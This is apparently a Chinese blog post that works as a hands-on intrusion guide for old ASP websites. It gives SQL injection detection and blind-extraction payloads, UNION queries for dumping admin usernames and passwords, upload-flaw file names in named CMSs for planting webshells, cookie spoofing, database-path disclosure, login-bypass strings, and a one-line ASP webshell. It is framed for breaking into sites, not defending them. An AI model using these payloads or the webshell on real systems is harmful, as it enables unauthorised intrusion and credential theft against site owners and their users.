sql

一、注入点的判断及猜解

1.加入单引号 ’提交,

结果:如果出现错误提示,则该网站可能就存在注入漏洞。

2.数字型判断是否有注入;

语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)

结果:分别返回不同的页面,说明存在注入漏洞.

分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询,

如果and前后的两条语句都是真的话就不会出错,但如果前后语句有一个为假的话,程序就会暴错。

也就表明程序有注入漏洞

防注入解决办法:

1>使用or 2>1 ; or 1>2来进行判断

  结果:分别返回不同的页面,说明存在注入漏洞.

  分析:or注入只要求前后两个语句只要有一个正确就为真,如果前后两个语句都是正确的,反而为

假。

   记住:or注入时,or后面的语句如果是正确的,则返回错误页面!如果是错误,则返回正确页面

,说明存在注入点。

2> 使用xor 1=1; xor 1=2

   结果:分别返回不同的页面,说明存在注入漏洞.

   分析:xor 代表着异或,意思即连接的表达式仅有一个为真的时候才为真。

   记住:xor注入时,xor后面的语句如果是正确的,则返回错误页面积,如果是错误,则返回正确

页面,说明存在注入点。

3>把and 1=1转换成URL编码形式后在提交

  and 1=1 URL编码:%41%4E%44%20%%31%3D%31

4>使用-1;-0

  分析:如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 

URL地址后面加上 -0,URL变成 news.asp?id=123-0,返回的页面和前面的

页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.

3.字符型判断是否有注入:

  语句:' and '1'=1;' and  '1=2(经典)

  结果:结果:分别返回不同的页面,说明存在注入漏洞.

  分析:加入' and '1'=1返回正确页面,加入' and  '1=2返回错误页面,说明有注入漏同。

  防注入解决办法:

  1>在URL的地址后面加上'%2B'(字符型)

  分析:URL地址变为:news.asp?id=123'%2B',返回的页面和1同;加

上'2%2B'asdf,URL地址变为:news.asp?id=123'%2Basdf,返回的页面和1

不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。

4.搜索型判断是否有注入:

简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜

索%,如果正常返回,说明95%有洞了。

说明:加入如"&;"、"["、"]"、"%"、"$"、"@"等特殊字符,都可以实现,如果出现错误,说明有问题

操作:

搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和

2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。

关键字%' and 1=1 and '%'='%

关键字%' and 1=2 and '%'='%

将and 1=1 换成注入语句就可以了

5.判断数据库类型:and user>0  例如:showdetail.asp?id=49 ;and user>0 

如果是ACCESS数据库,那么返回的错误里一般会有"Microsoft JET Database"关键定,如果是MSSQL数

据库的话返回的错误提示里一般会含有"SQL Server"关键了.

6.猜表名 and exists (select * from 表名)

  说明:意思与上面一样,只是用的语名不一样。

7.猜列名 and (select count(列名) from 表名)>0

  说明:如果我们输入的列名猜解正确否反回正常页面

8.猜长度 and (select top 1 len(username) from admin)>0

  说明:如果我们输入的最后一位数据返回错误,而错误前一位数字返回正确,说明我所猜解的长度

为正确。

9.猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii码1-128

  说明:如果我们输入的最后一位数据返回错误,而错误前一位数字返回正确,说明我所猜解的数字

正确。(可以使用折半法猜内容)

折半法:最小值与最大值差的一半,比如输入50返正确,输入100返回错误,折半后输入75。

10.联合查询注入(union查询)

操作步骤:

1>在正常语句后台加入 and 1=2 union select * form 表名,其中*号代表字段数量,从1一直追加

(and 1=2 union select 1,2,3,4 form 表名)如果字段数正确就会有暴错。

2>在页面显示数字的地方用真实得到的字段名代替,如:username,password.

3>在页面字段值处暴出真实的数据库字段值。

二、查找后台地址,找到后台用得到的用户管理员的帐户与密码进行登陆.

三、上传WEBSHELL

方法主要有:

1.上传漏洞: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞

了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用 

DOMAIN上传或是桂林老兵上传工具.

1>上传漏洞的文件

  动网是upfile.asp。

  动易是在upfile_soft.asp,(软件上传漏洞)upfile_softpic.asp(图片上传漏洞)

  动感是在uploadflash.asp,upfile_flash.asp,利用抓包工具抓包得到cookies,再用   DOMAIN上

传或是桂林老兵上传工具

2>添加上传类型

  asa|asaspp

3>就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。

4>上传图片文件木马,使用备份数据库得到asp文件

2.cookies欺骗

  使用cookies可以达到让网站认识你的目的。但是如果cookies验证不足就会形成cookies欺骗。用  

到工具 桂林老兵cookies欺骗工具。

3.%5c暴库

  把二级目录中间的/换成%5c EY:otherweb ... s.asp?BigClassName=职

责范围&;BigClassType=1 如果你能看到:’E:\ahttc040901

\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的 路径。 确定路径名称拼写是否正确,

以及是否 连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行

4.conn.asp暴库

  这个也是比较老的漏洞,利用价值不大

5.'or'='or'万能密码登陆

  ’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有 : 

  ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a  

  一个很老的利用方法,主要用于一些比较老的网站。

6.旁注,也就是跨站. 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务

器的站点,然后在利 用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点

,就是一些服务器 的绝对路径经过加密,这就看我们的本事了 

7.写入ASP格式数据库。就是一句话木马[〈%execute request("value")%〉 ],常用在留言本. 如:

这个就是ASP格式的数据库或者可以写入内容的

ASP文件,如南方数据的系统配置],再写 入一句话木马.

8.旁注,也就是跨站. 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务

器的站点,然后在利 用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点

,就是一些服务器 的绝对路径经过加密,这就看我们的本事了

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,372评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,368评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,415评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,157评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,171评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,125评论 1 297
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,028评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,887评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,310评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,533评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,690评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,411评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,004评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,659评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,812评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,693评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,577评论 2 353

推荐阅读更多精彩内容

  • 注入攻击的分类 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传...
    查无此人asdasd阅读 1,614评论 0 5
  • [SQL注入攻击] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式...
    James黄杰阅读 2,656评论 0 30
  • Sql 注入基础原理介绍一、实验说明1.1 实验内容SQL注入攻击通过构建特殊的输入作为参数传入Web应用程序,而...
    FreaxJJ阅读 1,819评论 3 23
  • 1.过滤URL中的一些特殊字符,动态SQL语句使用PrepareStatement.. 2.注入的方式就是在查询条...
    Explorer_Mi阅读 1,283评论 0 0
  • 读书于我 年轻的时候以为不读书不足以了解人生,直到后来才发现如果不了解人生,是读不懂书的。读书的意义大概就...
    流徒风情阅读 323评论 0 3